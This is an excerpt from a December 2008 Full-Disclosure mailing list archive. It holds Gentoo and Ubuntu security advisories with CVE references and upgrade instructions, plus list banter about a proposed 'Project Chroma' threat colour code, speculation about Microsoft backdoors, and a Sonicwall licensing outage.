(Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.1_powerpc.deb Size/MD5: 336314 e0028411b4af81155c1982ff337d42ee http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.1_powerpc.deb Size/MD5: 211612 2df6e5a5df87ca1d3a95d7918ff01a65 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1ubuntu1.1_sparc.deb Size/MD5: 314234 67fccb39c18bcb39a773b0eb5e2fe9e1 http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1ubuntu1.1_sparc.deb Size/MD5: 181098 3bf535ce2f3d9385e61b271426e45c37 Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0-1.1ubuntu1.1.diff.gz Size/MD5: 56403 70e219ec859f25bdf7ac45f07faa2afe http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0-1.1ubuntu1.1.dsc Size/MD5: 1246 4e61ec19bae78ef99c632a398a4dd081 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.4.0.orig.tar.gz Size/MD5: 845017 1f7f497798e06085767d645b0673562a amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.4.0-1.1ubuntu1.1_amd64.deb Size/MD5: 357022 ea21a9132b0654c39c05866edec72dd8 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.4.0-1.1ubuntu1.1_amd64.deb Size/MD5: 206042 a8648520afe8a53116613df55736712b i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.4.0-1.1ubuntu1.1_i386.deb Size/MD5: 319786 487eced921c7baa6be606961f6020dd0 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.4.0-1.1ubuntu1.1_i386.deb Size/MD5: 196246 4015b74d4e91e1720bdcc6d537de3bc2 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1.1ubuntu1.1_lpia.deb Size/MD5: 324676 827319f43ba42952929ee373b4659d91 http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1.1ubuntu1.1_lpia.deb Size/MD5: 197582 ac1494911ce7181bf413933b0d10c1b0 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1.1ubuntu1.1_powerpc.deb Size/MD5: 348320 5c8fac9d47df022aabaed60ec895caee http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1.1ubuntu1.1_powerpc.deb Size/MD5: 219940 5d8a707d8a1278d90c1d39e5da9fa3f1 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.4.0-1.1ubuntu1.1_sparc.deb Size/MD5: 321206 89fb42e14d2e5f4edb2edfd290e544f2 http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.4.0-1.1ubuntu1.1_sparc.deb Size/MD5: 185468 96423e069f49158142bf1b5d8627e5b4 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/eaa22f8e/attachment.bin From rholgstad at gmail.com Tue Dec 2 16:50:46 2008 From: rholgstad at gmail.com (rholgstad) Date: Tue, 02 Dec 2008 10:50:46 -0600 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> Message-ID: <49356766.9050307@gmail.com> Mike C wrote: > On Mon, Dec 1, 2008 at 5:27 PM, rholgstad wrote: > >> and how does making a color based on these inputs protect people? >> >> > > Once all desktops have an icon or widget (say at the right hand > corner) with the color, and this is consistently seen everywhere, the > users will start associating with their online security. they will be > reminded that they have to be careful with the data they share. > > This, if implemented correctly will be a boon to security industry, > where the weakest kinks currently are 'n00b' users. > > you are joking right? So some widget is going to stop the next SMB remote or IE client side and protect the 'n00b' users? Please explain how this works. Also please explain how "they will be reminded that they have to be careful with the data they share. " has anything to do with protecting a users machine from being compromised. From rysheve at gmail.com Tue Dec 2 17:13:46 2008 From: rysheve at gmail.com (Chris Jeane) Date: Tue, 2 Dec 2008 11:13:46 -0600 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <49356766.9050307@gmail.com> References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <49356766.9050307@gmail.com> Message-ID: If you are taking a proactive approach to security, maybe you should always remind the user to be careful with their data. How about 'all desktops have an icon or widget (say at the right hand corner)' that flashes red every five minutes and says 'be careful with the data you share.' This solution removes the overhead of all that pesky monitoring and data mining. The internet is a dangerous place, and will continue to be. My 'noob' grandmother doesn't need a 1-5 Danger Scale to keep her from being scammed when she buys holiday gifts online. [Grandmother Voice] 'Ohh dear we are at Internet Danger Level: Tangerine, guess I can't order those knit socks for Johnny today.' [End Grandmother Voice] On Tue, Dec 2, 2008 at 10:50 AM, rholgstad wrote: > Mike C wrote: > > On Mon, Dec 1, 2008 at 5:27 PM, rholgstad wrote: > > > >> and how does making a color based on these inputs protect people? > >> > >> > > > > Once all desktops have an icon or widget (say at the right hand > > corner) with the color, and this is consistently seen everywhere, the > > users will start associating with their online security. they will be > > reminded that they have to be careful with the data they share. > > > > This, if implemented correctly will be a boon to security industry, > > where the weakest kinks currently are 'n00b' users. > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/b5e97dfd/attachment.html From rbu at gentoo.org Tue Dec 2 17:30:56 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Tue, 2 Dec 2008 18:30:56 +0100 Subject: [Full-disclosure] [ GLSA 200812-03 ] IPsec-Tools: racoon Denial of Service Message-ID: <200812021831.01771.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: IPsec-Tools: racoon Denial of Service Date: December 02, 2008 Bugs: #232831 ID: 200812-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== IPsec-Tools' racoon is affected by a remote Denial of Service vulnerability. Background ========== IPsec-Tools is a port of KAME's implementation of the IPsec utilities. It contains a collection of network monitoring tools, including racoon, ping, and ping6. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-firewall/ipsec-tools < 0.7.1 >= 0.7.1 Description =========== Two Denial of Service vulnerabilities have been reported in racoon: * The vendor reported a memory leak in racoon/proposal.c that can be triggered via invalid proposals (CVE-2008-3651). * Krzysztof Piotr Oledzk reported that src/racoon/handler.c does not remove an "orphaned ph1" (phase 1) handle when it has been initiated remotely (CVE-2008-3652). Impact ====== An attacker could exploit these vulnerabilities to cause a Denial of Service. Workaround ========== There is no known workaround at this time. Resolution ========== All IPsec-Tools users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=net-firewall/ipsec-tools-0.7.1" References ========== [ 1 ] CVE-2008-3651 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3651 [ 2 ] CVE-2008-3652 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3652 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/12eda607/attachment.bin From rbu at gentoo.org Tue Dec 2 17:25:54 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Tue, 2 Dec 2008 18:25:54 +0100 Subject: [Full-disclosure] [ GLSA 200812-01 ] OptiPNG: User-assisted execution of arbitrary code Message-ID: <200812021825.57032.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: OptiPNG: User-assisted execution of arbitrary code Date: December 02, 2008 Bugs: #246522 ID: 200812-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A vulnerability in OptiPNG might result in user-assisted execution of arbitrary code. Background ========== OptiPNG is a PNG optimizer that recompresses image files to a smaller size, without losing any information. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-gfx/optipng < 0.6.2 >= 0.6.2 Description =========== A buffer overflow in the BMP reader in OptiPNG has been reported. Impact ====== A remote attacker could entice a user to process a specially crafted BMP image, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. Workaround ========== There is no known workaround at this time. Resolution ========== All OptiPNG users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-gfx/optipng-0.6.2" References ========== [ 1 ] CVE-2008-5101 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5101 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/ae2866fa/attachment.bin From rbu at gentoo.org Tue Dec 2 17:33:06 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Tue, 2 Dec 2008 18:33:06 +0100 Subject: [Full-disclosure] [ GLSA 200812-04 ] lighttpd: Multiple vulnerabilities Message-ID: <200812021833.10414.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: lighttpd: Multiple vulnerabilities Date: December 02, 2008 Bugs: #238180 ID: 200812-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in lighttpd may lead to information disclosure or a Denial of Service. Background ========== lighttpd is a lightweight high-performance web server. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-servers/lighttpd < 1.4.20 >= 1.4.20 Description =========== Multiple vulnerabilities have been reported in lighttpd: * Qhy reported a memory leak in the http_request_parse() function in request.c (CVE-2008-4298). * Gaetan Bisson reported that URIs are not decoded before applying url.redirect and url.rewrite rules (CVE-2008-4359). * Anders1 reported that mod_userdir performs case-sensitive comparisons on filename components in configuration options, which is insufficient when case-insensitive filesystems are used (CVE-2008-4360). Impact ====== A remote attacker could exploit these vulnerabilities to cause a Denial of Service, to bypass intended access restrictions, to obtain sensitive information, or to possibly modify data. Workaround ========== There is no known workaround at this time. Resolution ========== All lighttpd users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-servers/lighttpd-1.4.20" References ========== [ 1 ] CVE-2008-4298 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4298 [ 2 ] CVE-2008-4359 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4359 [ 3 ] CVE-2008-4360 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4360 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-04.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/4d577800/attachment.bin From rbu at gentoo.org Tue Dec 2 17:28:07 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Tue, 2 Dec 2008 18:28:07 +0100 Subject: [Full-disclosure] [ GLSA 200812-02 ] enscript: User-assisted execution of arbitrary code Message-ID: <200812021828.12222.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: enscript: User-assisted execution of arbitrary code Date: December 02, 2008 Bugs: #243228 ID: 200812-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Two buffer overflows in enscript might lead to the execution of arbitrary code. Background ========== enscript is a powerful ASCII to PostScript file converter. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-text/enscript < 1.6.4-r4 >= 1.6.4-r4 Description =========== Two stack-based buffer overflows in the read_special_escape() function in src/psgen.c have been reported. Ulf Harnhammar of Secunia Research discovered a vulnerability related to the "setfilename" command (CVE-2008-3863), and Kees Cook of Ubuntu discovered a vulnerability related to the "font" escape sequence (CVE-2008-4306). Impact ====== An attacker could entice a user or automated system to process specially crafted input with the special escapes processing enabled using the "-e" option, possibly resulting in the execution of arbitrary code. Workaround ========== There is no known workaround at this time. Resolution ========== All enscript users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/enscript-1.6.4-r4" References ========== [ 1 ] CVE-2008-3863 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3863 [ 2 ] CVE-2008-4306 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4306 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/a635f29c/attachment.bin From rbu at gentoo.org Tue Dec 2 17:40:19 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Tue, 2 Dec 2008 18:40:19 +0100 Subject: [Full-disclosure] [ GLSA 200812-05 ] libsamplerate: User-assisted execution of arbitrary code Message-ID: <200812021840.22230.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libsamplerate: User-assisted execution of arbitrary code Date: December 02, 2008 Bugs: #237037 ID: 200812-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A buffer overflow vulnerability in libsamplerate might lead to the execution of arbitrary code. Background ========== Secret Rabbit Code (aka libsamplerate) is a Sample Rate Converter for audio. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-libs/libsamplerate < 0.1.4 >= 0.1.4 Description =========== Russell O'Connor reported a buffer overflow in src/src_sinc.c related to low conversion ratios. Impact ====== A remote attacker could entice a user or automated system to process a specially crafted audio file possibly leading to the execution of arbitrary code with the privileges of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All libsamplerate users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=media-libs/libsamplerate-0.1.4" References ========== [ 1 ] CVE-2008-5008 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5008 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/9badb9f6/attachment.bin From rbu at gentoo.org Tue Dec 2 17:42:03 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Tue, 2 Dec 2008 18:42:03 +0100 Subject: [Full-disclosure] [ GLSA 200812-06 ] libxml2: Multiple vulnerabilities Message-ID: <200812021842.06701.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libxml2: Multiple vulnerabilities Date: December 02, 2008 Bugs: #234099, #237806, #239346, #245960 ID: 200812-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in libxml2 might lead to execution of arbitrary code or Denial of Service. Background ========== libxml2 is the XML (eXtended Markup Language) C parser and toolkit initially developed for the Gnome project. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-libs/libxml2 < 2.7.2-r1 >= 2.7.2-r1 Description =========== Multiple vulnerabilities were reported in libxml2: * Andreas Solberg reported that libxml2 does not properly detect recursion during entity expansion in an attribute value (CVE-2008-3281). * A heap-based buffer overflow has been reported in the xmlParseAttValueComplex() function in parser.c (CVE-2008-3529). * Christian Weiske reported that predefined entity definitions in entities are not properly handled (CVE-2008-4409). * Drew Yao of Apple Product Security reported an integer overflow in the xmlBufferResize() function that can lead to an infinite loop (CVE-2008-4225). * Drew Yao of Apple Product Security reported an integer overflow in the xmlSAX2Characters() function leading to a memory corruption (CVE-2008-4226). Impact ====== A remote attacker could entice a user or automated system to open a specially crafted XML document with an application using libxml2, possibly resulting in the exeution of arbitrary code or a high CPU and memory consumption. Workaround ========== There is no known workaround at this time. Resolution ========== All libxml2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.7.2-r1" References ========== [ 1 ] CVE-2008-3281 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281 [ 2 ] CVE-2008-3529 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529 [ 3 ] CVE-2008-4409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4409 [ 4 ] CVE-2008-4225 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4225 [ 5 ] CVE-2008-4226 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4226 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/883af837/attachment.bin From vulcanius at gmail.com Tue Dec 2 17:47:07 2008 From: vulcanius at gmail.com (vulcanius) Date: Tue, 2 Dec 2008 12:47:07 -0500 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <49356766.9050307@gmail.com> Message-ID: *Sorry for my double posting to you Chris. All this solution does is take up their resources and piss off the users who then find ways to get rid of it or circumvent the useless thing. In the case of Mike C this means they'll be disabling whatever security software is in place that uses it. Bravo folks, you've saved the tubes. On Tue, Dec 2, 2008 at 12:13 PM, Chris Jeane wrote: If you are taking a proactive approach to security, maybe you should always remind the user to be careful with their data. How about 'all desktops have an icon or widget (say at the right hand corner)' that flashes red every five minutes and says 'be careful with the data you share.' This solution removes the overhead of all that pesky monitoring and data mining. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/ca911b71/attachment.html From rbu at gentoo.org Tue Dec 2 17:55:03 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Tue, 2 Dec 2008 18:55:03 +0100 Subject: [Full-disclosure] [ GLSA 200812-07 ] Mantis: Multiple vulnerabilities Message-ID: <200812021855.07412.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Mantis: Multiple vulnerabilities Date: December 02, 2008 Bugs: #238570, #241940, #242722 ID: 200812-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been discovered in Mantis, the most severe of which leading to the remote execution of arbitrary code. Background ========== Mantis is a PHP/MySQL/Web based bugtracking system. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-apps/mantisbt < 1.1.4-r1 >= 1.1.4-r1 Description =========== Multiple issues have been reported in Mantis: * EgiX reported that manage_proj_page.php does not correctly sanitize the sort parameter before passing it to create_function() in core/utility_api.php (CVE-2008-4687). * Privileges of viewers are not sufficiently checked before composing a link with issue data in the source anchor (CVE-2008-4688). * Mantis does not unset the session cookie during logout (CVE-2008-4689). * Mantis does not set the secure flag for the session cookie in an HTTPS session (CVE-2008-3102). Impact ====== Remote unauthenticated attackers could exploit these vulnerabilities to execute arbitrary PHP commands, disclose sensitive issue data, or hijack a user's sessions. Workaround ========== There is no known workaround at this time. Resolution ========== All Mantis users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-apps/mantisbt-1.1.4-r1" References ========== [ 1 ] CVE-2008-3102 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3102 [ 2 ] CVE-2008-4687 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4687 [ 3 ] CVE-2008-4688 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4688 [ 4 ] CVE-2008-4689 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4689 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-07.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081202/66fc3083/attachment.bin From ureleet at gmail.com Tue Dec 2 18:08:53 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 2 Dec 2008 13:08:53 -0500 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <49356766.9050307@gmail.com> Message-ID: <6158bb410812021008u4b0509c7tc3f08cf9f58046e0@mail.gmail.com> mike c, u r now in the same group as n3td3v. congratulations 4 being a moron, doing repetitive work, and suggesting nonsensical material. nice idea. especially if it hadnt already been done. 10x over. o, and u werent the lead of it. plug urself much? how about u plug ur n3td3v group 2? On Tue, Dec 2, 2008 at 12:47 PM, vulcanius wrote: > *Sorry for my double posting to you Chris. > > All this solution does is take up their resources and piss off the users who > then find ways to get rid of it or circumvent the useless thing. In the case > of Mike C this means they'll be disabling whatever security software is in > place that uses it. > > Bravo folks, you've saved the tubes. > > On Tue, Dec 2, 2008 at 12:13 PM, Chris Jeane wrote: > > If you are taking a proactive approach to security, maybe you should always > remind the user to be careful with their data. > How about 'all desktops have an icon or widget (say at the right hand > corner)' that flashes red every five minutes and says 'be careful with the > data you share.' This solution removes the overhead of all that pesky > monitoring and data mining. > > ______________________________ > _________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Tue Dec 2 18:11:18 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 2 Dec 2008 13:11:18 -0500 Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored In-Reply-To: References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com> <4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com> <4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com> <6158bb410812020556r38ca2d25m201be44a4969dfbd@mail.gmail.com> Message-ID: <6158bb410812021011p6029b3bfxadb35266b7f1af91@mail.gmail.com> all speculation: no 1 knows 4 sure. http://it.slashdot.org/article.pl?sid=07/12/17/1754257&from=rss http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/ http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm c how i did that n3td3v? i posted links, nd talked about the article w/out stealing ppls work. pay attention. On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight wrote: > 2008/12/2 Ureleet >> >> u arent getting it. >> >> it has nothing 2 do w/ backdoors. they r talking about actual >> backdoors in the code. so that anyone who knows the backdoor can >> acess any windows system regarless. they r saying that microsoft has >> coded backdoors into the system so that the govt can get into any >> system, patched or not. pay attention. > > I haven't seen anything that suggests that systems are/will be backdoored > here. The text of the statement said "remote searches" which in legal terms > could be anything from something as simple as browsing shared files > available through P2P to full remote system access. > > Do you have anything else that suggests Windows has backdoors present other > than this statement? > From it.security.lists at gmail.com Tue Dec 2 19:14:43 2008 From: it.security.lists at gmail.com (IT Security) Date: Tue, 2 Dec 2008 14:14:43 -0500 Subject: [Full-disclosure] Sonicwall license servers down .. all customers affected Message-ID: <60af8ffb0812021114i194a4439qe396d4270fe00e8f@mail.gmail.com> Sonicwall (makers of various security products) has had their license manager (server) go haywire overnight and it's "reset" (meaning invalidated) the licenses on all of their email security products. This means customers can't login to their own systems (a good case against draconian DRM like this). Calls to support have gone straight to voicemail all morning, and no ETA for resolution yet exists. This is affecting **all** of their customers, as far as I can tell (and based on what I'm told by their general support ticket-taker). 